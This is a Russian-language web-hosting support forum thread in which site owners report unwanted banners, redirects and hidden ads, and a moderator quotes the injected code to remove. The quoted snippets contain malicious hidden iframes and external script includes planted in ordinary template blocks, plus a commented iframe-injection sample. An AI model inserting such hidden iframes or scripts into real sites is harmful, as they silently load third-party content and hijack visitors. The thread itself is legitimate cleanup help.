Модератор форума: Yuri_G  
Вирусы на сайтах (для изучения)
eustace
Сообщений: 4
Репутация: 3

Сообщение # 1246 | 19:22:49
Здравствуйте, на сайте появился баннер, виден под Гостем и под всеми логинами.
http://hundred.ucoz.ru
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1247 | 20:14:36
eustace, из глобального блока верхняя часть сайта, выделенное красным удалить
Quote
<tr><td colspan="2" height="6"></td></tr>
</table><script type="text/javascript" src="http://uclicks-begun.com/hit.js" ></script><!--/U1AHEADER1Z-->

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
figaro4669
Сообщений: 2
Репутация: 0

Сообщение # 1248 | 03:03:20
Помогите найти вирус на сайте. Где реклама, там есть небольшая картинка. На нее наводишь она увеличивается, при нажатии ведет на посторонний сайт.
1)http://selenaworld.ucoz.com/
2) Под гостем нет.

Добавлено (21-Сен-2011, 03:03:20)
---------------------------------------------

Quote (figaro4669)
2) Под гостем нет.

Ошибся то же есть.
christof
Сообщений: 1
Репутация: 0

Сообщение # 1249 | 14:06:06
webanet, Проблема с переадресацией с главной страницы на mail.ru
Вирусов вроде не обнаружено - во всяком случае Яндексвэбмастер и http://antivirus-alarm.ru.
Мой Сайт, где есть проблема:http://aiontest.at.ua
Переадресация происходит с Главной Страницы - http://aiontest.at.ua
А так же с меню на главной странице по определениям:
Информация о сайте http://aiontest.at.ua/index/0-2
Каталог файлов: http://aiontest.at.ua/load
Каталог статей: http://aiontest.at.ua/publ
Блог: http://aiontest.at.ua/blog
Фотоальбомы:http://aiontest.at.ua/photo
Гостевая: http://aiontest.at.ua/gb
Обратная связь:http://aiontest.at.ua/index/0-3
Photoshop:http://aiontest.at.ua/index/photoshop/0-5

На форум http://aiontest.at.ua/forum нет переадресациии.
На самом форуме их так же не бывает.
Все переадресации только с главной и меню на главной (кроме форума).

Добавлено (21-Сен-2011, 13:58:13)
---------------------------------------------
webanet, Проблема обнаруживается под логином

Добавлено (21-Сен-2011, 14:06:06)
---------------------------------------------
перед самой переадресацией в основном читаются сайты (ожидание кэша, отправка запроса) вроде d36.redist.ru (другие номера перед .redist.ru), bez-ruk.ru, s104.uros.ru
Потом переадресация или происходит, или нет. Алгоритм мне не понятен. перерыл все скрипты в шаблонах сайта - нет вроде ничего, что могло бы это инициировать...
Хэлп....

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1250 | 14:34:08
figaro4669, из блока личный кабинет удалите выделенное красным
Quote
<table class="boxTable" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="boxTitle"><b><!-- <bt> -->Личный кабинет<!-- </bt> --></b></td></tr><tr><td class="boxContent"><!-- <bc> --><div align="center"><strong>Среда <br> 21.09.2011 <br> 13:31</strong>
<br>
<script type="text/javascript" src="http://selenaworld.ucoz.com/chili/1.js
"></script>
<img class="userAvatar" title="Гость"

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1251 | 14:42:39
christof, из блока календарь, выделенное красным удалить
Quote
color_t= "7A5C40"; //Цвет текста (без #)
color_l= "018ab8"; //Цвет ссылки (без #)

</SCRIPT>
<SCRIPT src="http://aiontest.at.ua/js/dih_java.js" type="text/javascript">
</SCRIPT><!-- </bc> --></div></div>
</div>
о результатах отпишитесь

и подумайте над целесообразностью присутствия некоторых скриптов на вашем сайте и форуме. по меньшей мене они не рациональны. а необходимость некоторых мне кажется нулевой

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1252 | 16:17:31
christof, в блоке профиль выделенное красным удалить
Quote
<center><br>Ты здесь: <font color="#FF0000"><b>0</b></font>-й день </center>
<center><br><a href="javascript:openOnClick('users')"> Список пользователей</a> </center>
<center><br><a href="javascript:openOnClick('options')"> Изменить информацию</a> </center>
<center><br><iframe src="http://bez-ryk.ucoz.net/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><a id="upml2" href="javascript:openOnClick('mail')"> Читать ЛС (<b>0</b>)</a> </center>

<DIV><br><center><a target="_blank" href="http://aiontest.at.ua/index/10">

а слайдер ваш криво вставлен и будет работать только на главной. плюс тяжелый. в общем ваше дело. удаляйте что я сказала и перекидывать больше не будет. на будущее, если не понимаете работу скриптов, то не стоит их ставить к себе на сайт, и устраивать из сайта склад скриптов найденных в интернете

и календарь который вы удалили тоже не возвращайте там тоже был агрессивный код

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
проша777
Сообщений: 1
Репутация: 0

Сообщение # 1253 | 16:48:05
У МЕНЯ НА САЙТЕ http://yara.ucoz.ua/ СЛЫШНА РЕКЛАМА /ТОЛЬКО ЗВУК/ ADMARKET . ЭТО ЮКОЗ ЗАКИНУЛ ИЛИ ЧТО, НЕ МОГУ ЕЕ УДАЛИТЬ ПОМОГИТЕ,ЕСЛИ МОЖНО
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1254 | 16:58:22
проша777, из блока сканера доктора веба выделенное красным удалить

Quote
<form method="POST" id="drweb_online_scan_form"
enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window">
<div style="width: 190px; height: 105px; background: url(http://plusoft.ru/images/dr_web/fon_white.gif)"><div style="padding: 50px 10px 0 10px;"><iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe><div align="center"><input name="file" id="file_selection_input" type="file" size="15"></div>
<div style="padding-top: 5px; text-align: center"><input type="image" onclick="return do_scan_file_01();" src="http://plusoft.ru/images/dr_web/button.gif" width="121" height="21"></div></div></div><!--/U1DRIGHTER1Z-->
</td>


прелесть


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Darkest
Сообщений: 2
Репутация: 0

Сообщение # 1255 | 17:36:24
1)Проблема на главной странице www.rolecraft.ru
2)И под гостем тоже.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1256 | 17:57:11
Лёлька8518, зайдите в вебмастер гугла во вкладку безопасность - вредоносный код. там гугль должен выкладывать образцы вредоносного кода который он обнаружил на сайте
а те коды которые я указала не стоит держать на сайте. изучите содержимое этих скриптов, думаю все станет ясно. и содержимое имеет свойства изменяться.

Quote
и прислали Проблемные URL на сайте
унас тут не кружок литературоведов и мы тут не рассказываем рассказы. а сообщаем максимум информации. это значит, что нужно было не рассказать, а дать то, что прислал гугл

вот, чтобы было понятно на что могут лаять антивирусы, а так же гугл и яшка.

Quote
//newItem = document.createElement('div');
//newItem.setAttribute('style', 'display: none;');
//newItem.innerHTML='<if'+'rame scrolling="no" frameborder="0" marginheight="0" marginwidth="0" style="padding:0;margin:0;border:0px; display: none;" allowtransparency="true" vspace="0" hspace="0" src="http://stats.internet-yadro.com/stats.html?bid='+teasernet_blockid+'"></ifr'+'ame>';
//olditem = document.getElementById("teasernet_"+teasernet_blockid);
//olditem.parentNode.insertBefore(newItem, olditem);
teasernet_blockid = teasernet_padid = 0;


красным и синим выделены те места на которые срабатывают маски обнаружения поисковиков и антивирусов. на русском языке и для человеков можно перевести как создание и подгрузка скрытого элемента в фоновом режиме. а такое поведение считается агрессивным в любом случае, что бы фоном не откручивали скрыто от пользователя. теперь понятно?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1257 | 18:00:00
Darkest, из блока наш опрос выделенное красным удалить

Quote
<input type="hidden" name="id" value="2" />
<input type="hidden" name="a" value="1" /><input type="hidden" name="ajax" value="570" /></div>
<div style="padding-top:4px;text-align:center;"><iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><img alt="javascript://" rel="nofollow" onclick="new


вы свой сайт в мозиле видели? страшное зрелище

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Fufu
Сообщений: 1
Репутация: 1

Сообщение # 1258 | 18:04:05
Здравствуйте! У меня такая вот проблема, я захожу на свой сайт http://www.bloody-games.tk/, а меня перенаправляет вот сюда http://easyquizworld.com/d/b2l9o38107?subid=&_=1316699939

На сайт зайти вообще не могу, а вот в ПУ захожу спокойно, но как только перехожу на страницу сайта то опять же эта фигня http://i061.radikal.ru/1109/1f/6771201e6afe.jpg
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1259 | 18:12:03
Fufu, зайдите в панель управления - в настройки домена. снимите галочку с автоматического перенаправления со стандартного домена на юкозовский и после снятия перенаправления попробуйте зайти на сайт по старому юкозовскому адресу

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
figaro4669
Сообщений: 2
Репутация: 0

Сообщение # 1260 | 19:53:39
Помогите найти вирус на сайте. Где реклама, там есть небольшая картинка. На нее наводишь она увеличивается, при нажатии ведет на посторонний сайт.
1)http://selenaworld.ucoz.com/
2) Я уже обращался но есть еще где то не могу найти Вроде бы уже все пересмотрел(
http://selenaworld.ucoz.com/news/2
Поиск: